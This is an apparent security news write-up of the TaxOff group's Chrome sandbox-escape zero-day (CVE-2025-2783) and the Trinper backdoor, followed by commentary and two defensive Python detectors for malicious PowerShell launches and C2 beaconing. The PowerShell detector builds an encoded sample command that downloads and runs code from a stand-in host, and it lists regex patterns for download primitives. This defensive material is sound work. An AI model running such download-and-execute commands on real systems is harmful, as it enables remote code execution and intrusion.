Critical Chrome Zero-Day Exploited by TaxOff Group to Deploy Stealthy Trinper Backdoor

In March 2025, a dangerous security vulnerability in Google Chrome was exploited by a sophisticated threat actor known as TaxOff. This flaw, later patched by Google, allowed attackers to bypass Chrome’s sandbox protection and silently install a powerful backdoor called Trinper. The attack highlights the increasing complexity of cyber threats targeting government and corporate networks through carefully crafted phishing campaigns and zero-day exploits.

The Chrome Zero-Day Exploit and the TaxOff Campaign

In mid-March 2025, researchers at Positive Technologies detected active exploitation of a Google Chrome zero-day, tracked as CVE-2025-2783 (CVSS score 8.3, rated high). The flaw lies in Mojo, Chrome’s inter-process communication layer, on Windows: an incorrect handle passed across the IPC boundary let attackers escape Chrome’s sandbox and execute code on the host outside the browser’s restricted environment. The exploit was weaponized by the group tracked as TaxOff, known for targeting Russian organizations with phishing emails disguised as invitations to events such as the Primakov Readings forum.

The initial infection vector was a phishing email containing a malicious link. A single click on the link was enough: the page triggered the exploit, which installed the Trinper backdoor with no further user interaction. Written in C++, Trinper uses multiple threads to collect data quietly, including keystrokes, documents with selected extensions (.doc, .xls, .ppt, .rtf, .pdf), and host details. It then connects to a remote command-and-control (C2) server from which the operators can issue instructions for file operations, command execution, reverse shell deployment, and self-termination.

Positive Technologies’ investigation also surfaced a similar earlier attack from October 2024, which likewise began with phishing emails impersonating an international security conference. In that case the payload arrived in a ZIP archive containing a Windows shortcut (.lnk); opening the shortcut launched a PowerShell command that deployed Trinper through Donut, an open-source loader that packages executables and .NET assemblies as position-independent shellcode. Some variants of the attack delivered Cobalt Strike instead, showing that the toolkit is swapped and adapted between operations.
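The October 2024 chain described above (archive, shortcut, PowerShell, Donut) leaves a process-creation trail that an EDR or Sysmon pipeline can score. The following Python is an added example written for this page, not code from Positive Technologies or from the campaign itself: the event records are constructed to resemble Sysmon Event ID 1 fields, the encoded PowerShell payload is built inline rather than taken from the real attack, and the archive-extraction folder names (Explorer’s Temp<N>_<archive>.zip, WinRAR’s Rar$, 7-Zip’s 7z prefixes) are assumptions to adjust for your own environment.

```python
import base64
import binascii
import re

# Constructed sample: the -EncodedCommand payload is built here, not taken
# from the real campaign. PowerShell expects UTF-16LE before base64 encoding.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed Sysmon-style process-creation events (Event ID 1 field names).
SAMPLE_EVENTS = [
    {   # user opened a .lnk from inside a ZIP that Explorer unpacked to %TEMP%
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": f"powershell.exe -w hidden -nop -ep bypass -enc {_ENC}",
        "CurrentDirectory": r"C:\Users\ivanov\AppData\Local\Temp\Temp1_invitation.zip",
    },
    {   # benign scheduled script
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1",
        "CurrentDirectory": r"C:\Scripts",
    },
    {   # benign document open
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"WINWORD.EXE" /n "C:\Users\ivanov\Downloads\agenda.docx"',
        "CurrentDirectory": r"C:\Users\ivanov\Downloads",
    },
]

ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")

# Each indicator is checked against the raw command line plus the decoded payload.
INDICATORS = [
    (re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden"), "hidden window"),
    (re.compile(r"(?i)(?:^|\s)-(?:ep|executionpolicy)\s+bypass"), "execution policy bypass"),
    (re.compile(r"(?i)(?:^|\s)-(?:nop|noprofile)\b"), "profile suppressed"),
    (re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), "Invoke-Expression"),
    (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"),
     "download primitive"),
]

# Assumed extraction-folder naming: Explorer uses %TEMP%\Temp<N>_<name>.zip,
# WinRAR and 7-Zip use Rar$ / 7z prefixes. Adjust for the archivers you deploy.
ARCHIVE_TEMP_RE = re.compile(r"(?i)\\AppData\\Local\\Temp\\(?:Temp\d+_.*\.zip|Rar\$|7z)")


def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand text, or '' if absent or malformed."""
    m = ENC_RE.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except (binascii.Error, ValueError):
        return ""


def score_event(ev):
    """Score one process-creation event; returns (score, list of reasons)."""
    reasons = []
    if not ev.get("Image", "").lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return 0, reasons
    if ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        reasons.append("PowerShell started by Explorer (shortcut or double-click)")
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append("encoded command")
    text = cmd + " " + decoded
    for pattern, label in INDICATORS:
        if pattern.search(text):
            reasons.append(label)
    if ARCHIVE_TEMP_RE.search(ev.get("CurrentDirectory", "")):
        reasons.append("running from an archive extraction folder")
    return len(reasons), reasons


def detect(events, threshold=3):
    """Return events whose indicator count reaches the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"CommandLine": ev.get("CommandLine", ""),
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"])
```

Only the first event reaches the threshold: Explorer as parent, a hidden window, an encoded command whose decoded body contains a download-and-execute primitive, and a working directory inside an archive extraction folder. Decoding the -EncodedCommand before matching is the step worth keeping, since a rule that only inspects the raw command line sees nothing but base64.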

The campaign bears tactical similarities to attacks attributed to another hacking group known as Team46. These connections suggest a possible overlap or collaboration between the two groups. Previous Team46 phishing campaigns also utilized malicious ZIP attachments containing PowerShell commands to deploy backdoors in critical Russian infrastructure sectors, including telecom and rail freight.

Moreover, an earlier related intrusion in March 2024 exploited a zero-day vulnerability in the Yandex Browser (CVE-2024-6473) via DLL hijacking to deliver malware—demonstrating the attackers’ consistent use of zero-days to bypass defenses.

Researchers emphasize that TaxOff’s reliance on zero-day exploits combined with sophisticated multithreaded malware reflects a long-term strategy to maintain persistent, stealthy access to targeted networks.

What Undercode Say: Analyzing the TaxOff Campaign and Its Implications

The recent revelation of the Chrome zero-day exploited by TaxOff underlines a significant escalation in the cyber threat landscape, especially in targeted attacks against government and critical infrastructure sectors. This campaign highlights several key trends:

1. Increasing Sophistication of Attackers:

TaxOff’s use of a zero-day vulnerability coupled with multithreaded backdoor architecture shows a high degree of technical expertise. The ability to leverage sandbox escapes in modern browsers is particularly alarming since browsers are often the frontline of defense in corporate environments.

2. Persistent and Adaptive Attack Vectors:

The delivery method changed between campaigns: the October 2024 wave relied on ZIP archives carrying a shortcut and a PowerShell loader, while the March 2025 wave needed only a link that triggered the browser exploit. The use of open-source tooling such as Donut alongside a commercial framework such as Cobalt Strike shows the same flexibility on the payload side.

3. Overlap of Threat Actor Groups:

The similarities between TaxOff and Team46 tactics suggest either a shared toolkit or coordinated operations. This blurs attribution lines but also signals a potentially larger, more organized threat infrastructure behind these intrusions.

4. Long-Term Targeting and Persistence:

The presence of backdoors with multi-functional capabilities designed to maintain long-term access indicates that attackers are focused on espionage or data theft rather than short-term disruption. This makes early detection and remediation more challenging.

5. Importance of Timely Patch Management:

Google patched the Chrome vulnerability within days of it being reported, which shows what fast vendor response looks like. However, the intrusions that succeeded before the fix shipped underline that patching alone is reactive; proactive threat intelligence and layered defenses are needed for the window in which a zero-day is in use.

6. Focus on Russian Organizations and Sensitive Sectors:

The targeted nature of the campaign, aimed at Russian organizations including government bodies and, in the related Team46 activity, telecom and rail freight operators, points to espionage rather than financially motivated crime. Organizations in these sectors should heighten their vigilance and improve phishing awareness.

7. Advanced Malware Engineering:

Trinper’s multithreaded design lets keystroke capture, document collection and C2 command handling run concurrently without one task stalling the others, which keeps the implant responsive to its operators while it harvests data. This kind of engineering is increasingly common among advanced persistent threat (APT) actors.

Recommendations:

Organizations should prioritize employee training against phishing, keep browsers on automatic updates so sandbox-escape fixes land quickly, deploy endpoint detection and response (EDR) tooling that records process trees and PowerShell command lines, and enforce application control policies that block shortcut-launched scripts from archive extraction folders. Monitoring outbound network traffic for connections to unknown hosts, and for the regular check-in pattern typical of backdoors, can surface C2 communications early.
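As a concrete illustration of the last recommendation, the following Python is an added example, not code from the article or from Positive Technologies: it looks for beacon-like regularity in outbound connections grouped by source, destination and port. The flow records are constructed; the article says nothing about Trinper’s actual check-in interval, so the 60-second period, the minimum connection count and the coefficient-of-variation threshold are assumptions to tune against your own baseline.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_flows():
    """Constructed outbound flow records (not real traffic) for one workstation."""
    base = datetime(2025, 3, 20, 9, 0, 0)
    flows = []
    # Assumed periodic check-in: 20 connections about every 60 s with a few seconds of jitter.
    jitter = [0, 3, -2, 1, 4, -1, 2, 0, -3, 1, 2, -2, 0, 3, -1, 1, 0, -2, 2, 1]
    for i, j in enumerate(jitter):
        flows.append({"ts": base + timedelta(seconds=60 * i + j), "src": "10.0.0.23",
                      "dst": "203.0.113.10", "dport": 443, "bytes_out": 412})
    # Ordinary browsing to another host: irregular gaps between connections.
    gaps = [0, 7, 95, 140, 12, 600, 33, 1800, 4, 250]
    t = base
    for g in gaps:
        t += timedelta(seconds=g)
        flows.append({"ts": t, "src": "10.0.0.23", "dst": "198.51.100.7",
                      "dport": 443, "bytes_out": 1500 + g})
    return sorted(flows, key=lambda f: f["ts"])


def find_beacons(flows, min_conns=10, max_cv=0.2):
    """Flag (src, dst, port) tuples whose inter-connection gaps are unusually regular.

    The coefficient of variation (stdev / mean) of the gaps is low for timed
    check-ins and high for human-driven traffic. Both thresholds are assumptions.
    """
    groups = defaultdict(list)
    for f in flows:
        groups[(f["src"], f["dst"], f["dport"])].append(f["ts"])
    hits = []
    for (src, dst, dport), times in groups.items():
        if len(times) < min_conns:
            continue  # too few connections to judge periodicity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue  # all connections share one timestamp; not a beacon pattern
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "dport": dport, "conns": len(times),
                         "mean_interval_s": round(mean, 1), "cv": round(cv, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(build_sample_flows()):
        print(hit)
```

The browsing host has enough connections to be evaluated but its gap variance is far too high to qualify; the check-in host is flagged with a mean interval near 60 s and a coefficient of variation around 0.05. In practice the same grouping would run over proxy or NetFlow exports per day, with known-good destinations (update servers, SaaS telemetry) allow-listed before scoring.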

Overall, this incident is a stark reminder of the ongoing cyber arms race where attackers continuously refine their methods to bypass traditional security controls. It reinforces the need for a proactive, intelligence-driven security posture.

Fact Checker Results ✅❌

✅ The Chrome vulnerability CVE-2025-2783 was confirmed and patched by Google in March 2025.
✅ The phishing attacks used disguised event invitations as lures, consistent with standard social engineering tactics.
✅ Kaspersky first reported the in-the-wild exploitation of CVE-2025-2783 (which it tracks as Operation ForumTroll) and Google fixed it; Positive Technologies separately documented the TaxOff attribution and the Trinper backdoor.

Prediction 🔮

Given the trend demonstrated by TaxOff and similar groups, we expect zero-day exploits in widely used software such as browsers to remain a primary initial-access vector for advanced threat actors. These actors will likely keep refining multistage delivery methods to evade detection and prolong persistence. The overlap between TaxOff and Team46 may signal a larger shared operation or pooled tooling, leading to more coordinated espionage campaigns. Organizations must stay vigilant, integrating threat intelligence and rapid patch deployment to mitigate these evolving risks.

References:

Reported By: thehackernews.com